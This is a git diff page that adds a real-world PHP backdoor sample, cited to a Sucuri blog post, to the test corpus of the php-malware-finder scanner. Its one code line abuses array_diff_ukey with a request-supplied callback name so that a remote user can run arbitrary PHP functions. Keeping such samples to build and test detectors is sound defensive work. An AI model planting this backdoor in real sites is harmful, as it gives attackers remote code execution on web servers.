summaryrefslogtreecommitdiff
path: root/php-malware-finder/samples/real/sucuri_2014_04.php
diff options
context:
space:
mode:
Diffstat (limited to 'php-malware-finder/samples/real/sucuri_2014_04.php')
-rw-r--r--php-malware-finder/samples/real/sucuri_2014_04.php3
1 files changed, 3 insertions, 0 deletions
diff --git a/php-malware-finder/samples/real/sucuri_2014_04.php b/php-malware-finder/samples/real/sucuri_2014_04.php
new file mode 100644
index 0000000..64bfa07
--- /dev/null
+++ b/php-malware-finder/samples/real/sucuri_2014_04.php
@@ -0,0 +1,3 @@
1<?php
2/* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */
3@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);